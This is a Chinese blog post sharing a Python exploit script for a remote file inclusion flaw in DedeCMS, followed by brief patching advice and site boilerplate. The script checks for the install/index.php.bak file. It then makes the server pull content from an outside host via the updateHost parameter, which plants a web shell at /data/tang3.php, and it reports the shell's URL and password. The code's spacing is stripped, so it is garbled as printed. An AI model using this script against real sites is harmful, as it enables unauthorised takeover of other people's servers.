最新python织梦dedecms远程执行脚本【详细介绍】

HI,大家好,废话不多说,直接上干货:最新python织梦dedecms远程执行脚本,以及织梦cms漏洞漏洞,脚本,视频教程相关的问题,主要就是想给大家提供一个思路分享给大家,毕竟也是经过一系列总结过的哈!

织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。

织梦CMS漏洞代码

#!/usr/bin/envpython
#coding=utf-8
#Joseph(小续)
importrequests
importsys
importre
defmain():
try:
url="http://"+sys.argv[1].strip('http://')
exceptIndexError:
print'''
poc:dede.py[url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
ifcode==200:
printu"恭喜存在此漏洞"
printu"Ongoingattacks--->>>>>"
exploit(url)
pass
else:
printu"sorry漏洞正在挣扎"
pass
defexploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
ifProbe.findall(htmlcontent):
printu'''
ver:getshell成功
shell:url+/data/tang3.php?a=0密码为:c
'''
pass
else:
printu"请看远程地址是否已经不可用"
pass
if__name__=='__main__':
main()

修复方法

1、建议安装完成后,删除(改名)install文件夹。

2、给data文件夹改名,或者移动位置。

3、到织梦后台,升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢!

相关专题

Python

Python

2020-11-19 192

Python专题为了整理了关于Python学习资料,包含Python入门视频教程,Python视频教程,Python电子书,Python手册下载等等.

  • Python一键安装卸载工具V1.0
    [2022-07-21]
  • Python+HTML随机点名抽奖源码模板
    [2021-11-01]
  • [阿里云盘]python爬虫验证码识别破解教程
    [2021-09-19]
  • Python百度贴吧一键自动签到脚本
    [2021-06-10]
  • Python语法整理合集pdf电子书
    [2021-04-23]

好了,这篇文章就到这里吧,希望你看到这篇文章以后能有所启发,阅读完最新python织梦dedecms远程执行脚本【详细介绍】感觉学到很多知识,那就帮忙点个赞吧!也可以收藏寂寞网哈!

本文发布者:站长老油条,不代表寂寞网立场,转载请注明出处:https://www.jimowang.com/p/20516.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 jimowangmail@126.com 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022年12月6日 09:31
下一篇 2022年12月6日 09:33

相关推荐

  • 如何在网络黄页推广中避免违规和不良信息(避免违规和不良信息技巧和建议)

    如何在网络黄页推广中避免违规和不良信息(避免违规和不良信息技巧和建议) 网络黄页推广是一种常见的网络营销方式,能够帮助企业吸引更多的潜在客户。然而,由于一些不良商家利用这一平台发布违规和不良信息,使得网络黄页推广受到了一定的质疑和监管。为了避免违规和不良信息的传播,我们需要采取一些技巧和建议。 1. 优化关键词选择 首先,在发起网络黄页推广前,我们需要进行关…

    2023年8月29日
  • iframe禁止跨域嵌套的方法【详细介绍】

    最近比较忙,今天尤颢哲又抽时间给大家带来了iframe禁止跨域嵌套的方法干货,还有关于iframe跨域嵌套,方法,解决方案等等其他相关干货,认认真真阅读完,若能把我想表达的全部理解,相信你已经离大牛不远了哈! 腾讯QQ空间防嵌套方法 document.domain=”qq.com”;var_s_=newDate(),g_T={},siDomain=”ctc….

    技术 2022年9月10日
  • 微信远程协助的未来发展与趋势(微信远程协助未来发展分析与趋势预测)

    微信远程协助的未来发展与趋势 微信远程协助是一种方便快捷的远程协助工具,在如今这个数字化时代,它的需求量正在不断增加。未来,微信远程协助将会朝着更加便捷、高效、安全、智能的方向发展。下面将详细分析微信远程协助的未来发展与趋势。 一、微信远程协助的未来发展 1. 更便捷的操作体验 未来微信远程协助将会提供更加便捷的操作体验。例如,用户只需要通过扫描二维码或点击…

    技术 2023年9月11日
  • 四大直辖市城市竞争力排名分析(四大直辖市城市竞争力比较与评估)

    四大直辖市城市竞争力排名分析 北京、上海、天津、重庆,是中国的四大直辖市,也是中国的政治、经济、文化中心之一。四大直辖市的城市竞争力排名,一直是人们关注的焦点。2021年,四大直辖市的城市竞争力排名如何?未来四大直辖市的城市竞争力又将如何发展? 一、北京 作为中国的政治中心,北京市在城市竞争力方面排名第一。2021年,北京市的GDP为2429.6亿元,人均G…

    技术 2023年8月21日
  • 站长工具检测HTTPS证书PCI DSS不合规是什么原因【一看就会】

    HI,大家好,废话不多说,直接上干货:站长工具检测HTTPS证书PCI DSS不合规是什么原因,还有关于PCI DSS不合规证书,站长,工具这些的相关干货文章,这些其实都是一些必备知识,只是有些时候我们没有遇到就没有去了解而已! 前言 用站长工具检测发现HTTPS证书显示“PCI DSS不合规”,如下图,大家也可以自行检测下,检测地址:https://sto…

    2022年11月6日
  • 如何评估手机光圈的调节效果?(手机光圈调节效果评估方法介绍)

    如何评估手机光圈的调节效果? 手机光圈是摄像头中的一个重要组件,它控制着进入相机的光线量,从而影响照片的曝光和清晰度。本文将介绍如何评估手机光圈的调节效果,帮助您更好地了解和掌握手机摄影技巧。 评估手机光圈调节效果的因素 曝光度:评估照片的曝光度是否合适,是否过度或不足。过度曝光的照片会失去细节,而不足曝光的照片则会显得暗淡无光。 清晰度:评估照片的清晰度和…

    2023年9月2日